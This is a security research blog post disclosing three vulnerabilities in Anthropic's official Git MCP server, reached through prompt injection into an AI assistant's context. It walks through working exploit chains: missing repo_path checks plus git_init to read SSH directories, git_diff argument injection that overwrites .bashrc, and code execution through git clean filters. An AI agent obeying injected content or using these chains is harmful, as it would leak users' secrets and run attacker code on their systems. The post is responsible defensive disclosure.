All insights

January 20, 2026

8 min read

Cyata Research: Breaking Anthropic’s Official MCP Server

Written by Yarden Porat

How We Found Code Execution in Anthropic’s Official Git MCP Server

TL;DR

What happened:

Cyata discovered three security vulnerabilities in mcp-server-git, the official Git MCP server maintained by Anthropic. These flaws can be exploited through prompt injection, meaning an attacker who can influence what an AI assistant reads (a malicious README, a poisoned issue description, a compromised webpage) can weaponize these vulnerabilities without any direct access to the victim’s system.

What’s the impact:

These vulnerabilities allow attackers with prompt injection to:

Why this matters: These vulnerabilities affect Anthropic’s official MCP server, the reference implementation maintained by the creators of MCP themselves. Unlike prior findings that required specific configurations, these work on any configuration out of the box.

Who’s affected:

If you’re using mcp-server-git versions prior to 2025.12.18, update to the latest version.

Vulnerability Summary

Background: What is MCP?

The Model Context Protocol (MCP) is an open standard introduced by Anthropic in November 2024. It provides a unified way for AI assistants (Claude Desktop, Cursor, Windsurf, etc.) to interact with external tools and data sources including filesystems, databases, APIs, and development tools like Git.

MCP servers are programs that expose these capabilities to the AI, acting as a bridge between the LLM and external systems.

This architecture introduces a critical security consideration: MCP servers execute actions based on LLM decisions, and LLMs can be manipulated through prompt injection. A malicious actor who can influence the AI’s context can trigger MCP tool calls with attacker-controlled arguments.

Discovery Process

During my early days at Cyata, I was working with MCP and wanted to understand how the official servers work. So I started reading through the code.

The mcp-server-git is pretty straightforward. You configure it like this:

"mcpServers": {
  "git": {
    "command": "uvx",
    "args": ["mcp-server-git", "--repository", "path/to/git/repo"]
  }
}

And then you can call basic git commands – git_add, git_commit, git_log, git_diff, and so on.

When you call a tool in mcp-server-git, this is what the code looked like:

@server.call_tool()
async def call_tool(name: str, arguments: dict) -> list[TextContent]:
        repo_path = Path(arguments["repo_path"])
        
        if name == GitTools.INIT:
           ....
            
        # For all other commands, we need an existing repo
        repo = git.Repo(repo_path)

        match name:
            case GitTools.STATUS:
                ...
            case GitTools.DIFF_UNSTAGED:
                ...
            case GitTools.DIFF_STAGED:
                ...

Do you see the problem? The repo_path comes directly from arguments["repo_path"]. The --repository flag that was configured is never compared or checked. The server just uses the path it receives.

This means an attacker could access any git repository on the system, not just the one configured in --repository.

Based on this, our team started looking into mcp-server-git. The git_init tool had the same problem: no path validation at all. It could create a new git repository in any directory on the filesystem.

Combine these two, and you have a powerful primitive: take any directory (like /home/user/.ssh), turn it into a git repository with git_init, then use git_log or git_diff to read its contents. The files get loaded into the LLM context, effectively leaking sensitive data to the AI.

At this point, we reported the findings to Anthropic via HackerOne. The report wasn’t initially accepted, so our team continued researching, looking for more direct impact. (See timeline at the end of this post.)

git_diff argument injection (CVE-2025-68144)

That’s when we found the git_diff function:

def git_diff(repo: git.Repo, target: str, context_lines: int = DEFAULT_CONTEXT_LINES) -> str:
    return repo.git.diff(f"--unified={context_lines}", target)

The target parameter is passed directly to the git CLI. No sanitization. This means you can inject any git flag, including --output, which writes the diff result to a file.

{
  "name": "git_diff",
  "arguments": {
    "repo_path": "/home/user/repo",
    "target": "--output=/home/user/.bashrc"
  }
}

The result? The diff output (empty in most cases) overwrites the target file. Arbitrary file deletion.

git_init File Deletion

We still thought the initial git_init and repo_path bypass could lead to something more.

First, the team realized that an attacker could also achieve file deletion with a little git trickery:

Let’s say we want to delete /home/user/.ssh/authorized_keys:

  1. git_init in /home/user/.ssh
  2. git_commit to create an initial commit
  3. git_branch to create a new branch
  4. git_add authorized_keys
  5. git_commit on the new branch
  6. git_checkout back to the original branch

The file disappears from the working directory (though it’s still stored in .git).

git_init Code execution

With git_init, an attacker could create a git repository anywhere on the filesystem. But to get code execution, we needed something extra: the ability to write files.

One common use of mcp-server-git is in AI-powered IDEs like Cursor, Windsurf, or GitHub Copilot. In these environments, there are typically two ways the AI can write files:

  1. Filesystem MCP server – Anthropic’s official MCP server for file operations
  2. IDE built-in file writing – Native file write capabilities built into the IDE

Most setups have at least one of these enabled. (Note: some of these paths are more restricted now, but back then they weren’t.)

Our first thought was git hooks, write a malicious script to .git/hooks/pre-commit. But that doesn’t work. Git hooks require execute permission, and neither the Filesystem MCP server nor IDE file writers set the execute bit.

So we started going through git features, looking for anything that could execute code without needing the execute bit. Eventually, we found smudge and clean filters.

Git has a feature where you can configure filters in .git/config that run shell commands when files are staged (clean) or checked out (smudge). The key insight: these execute via shell directly, no execute permission needed on any file.

The attack chain:

  1. Use git_init to create a repo in a writable directory
  2. Use the Filesystem MCP server to write a malicious .git/config with a clean filter
  3. Write a .gitattributes file to apply the filter to certain files
  4. Write a shell script with the payload
  5. Write a file that triggers the filter
  6. Call git_add,  the clean filter executes, running our payload

Timeline

June 24, 2025 – Initial report submitted to Anthrophic via Hackerone(repo_path not checked and git_init file leak) .

June 25, 2025 – Report marked as informative.

July 6, 2025 – Second report submitted with git_diff argument injection and code execution findings.

July 24, 2025 – Anthropic reopened the report.

September 10, 2025 – Report accepted.

December 17, 2025 – 3 CVEs assigned and a fix was committed.

Remediation

About Cyata

This research reflects what we do at Cyata: understanding how agentic systems behave in the wild and where they break. As organizations adopt AI agents that operate autonomously, they face risks that don’t fit traditional security models. Cyata is the control plane for AI agents, built to help organizations discover, explain, and control every AI agent in their environment before those risks become incidents.

The Control Plane for Agentic Identity

More insights

Blog

Sign up for Cyata’s Newsletter

Get early access, research, and updates from the leaders in Agentic Identity.

By submitting, you agree to our Privacy Policy